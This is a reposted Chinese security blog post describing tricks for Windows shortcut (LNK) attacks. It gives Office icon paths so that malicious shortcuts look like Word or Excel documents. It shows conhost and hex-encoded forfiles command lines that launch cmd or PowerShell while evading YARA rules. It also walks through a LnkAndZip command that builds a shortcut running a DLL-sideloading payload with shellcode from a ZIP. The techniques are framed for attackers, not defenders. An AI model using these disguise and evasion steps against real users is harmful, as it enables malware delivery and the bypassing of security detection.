关于Lnk攻击的一些技巧

admin
admin
admin
102620
文章
87
评论
2024年2月1日00:21:41评论79 views字数 2404阅读8分0秒阅读模式

修改你Lnk文件的图标

如下图标路径,只要对方安装了Office一般路径是不会改变的。

access = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}accicons.exe"excel = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}xlicons.exe"lync = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}lyncicon.exe"office = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}ohub32.exe",56onedrive = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}grv_icons.exe"onenote = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}joticon.exe"outlook = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}outicon.exe"powerpoint = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pptico.exe"project = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pj11icon.exe"publisher = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pubs.exe"visio = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}visicon.exe"word = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}wordicon.exe"

使用Lnk来运行你的powershell或CMD

需要注意的是不要直接去运行powershell或CMD,可以使用const来去运行。

C:windowssystem32conhost.exe conhost conhost conhost conhost conhost conhost cmd /c notepad
C:windowssystem32conhost.exe conhost conhost conhost conhost conhost conhost powershell ...

关于Lnk攻击的一些技巧

使用Forfiles运行

因为Forfiles支持16进制编码,可以帮助我们逃避一些Yara规则。

forfiles.exe /p c:windowssystem32 /m user32.dll /c "0x630x6d0x640x200x2f0x63 notepad | calc

这里的0x630x6d0x640x200x2f0x63 其实就是cmd /c

关于Lnk攻击的一些技巧

如下进程链:

关于Lnk攻击的一些技巧

Lnk执行ZIP中恶意程序

Lnk中执行ZIP中的恶意程序,这里思路是这样的,我们在ZIP中使用白加黑的方式,将白程序和黑DLL以及shellcode压缩成ZIP文件。

然后使用Lnk文件去调用。

这里使用到如下工具:

https://www.x86matthew.com/view_post?id=embed_exe_lnk

使用cl.exe编译之后 然后使用如下命令制作恶意.lnk,在这之前需要将白程序打包成一个zip文件。

然后如下命令去生成arp.lnk。第一个参数表示你压缩的zip文件,第二个参数表示你要生成的.lnk名称,第三个参数表示你要执行zip压缩包中的那个程序。

可以看到成功调用。

LnkAndZip.exe arp.zip arp.lnk arphaCrashReport64.exe "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}wordicon.exe"

关于Lnk攻击的一些技巧

这里图标没有显示出来的原因是,我这个虚拟机没有装Office。

将文件拉到我物理机可以看到已经有word图标了。

关于Lnk攻击的一些技巧

ZIP压缩包中的文件:

关于Lnk攻击的一些技巧

如下攻击链:

Lnk --> arp.zip --> arphaCrashReport64.exe --> arphaDump64.dll --> ...这里可以写shellcode

原文始发于微信公众号(Relay学安全):关于Lnk攻击的一些技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月1日00:21:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于Lnk攻击的一些技巧http://cn-sec.com/archives/2452393.html

发表评论

匿名网友 填写信息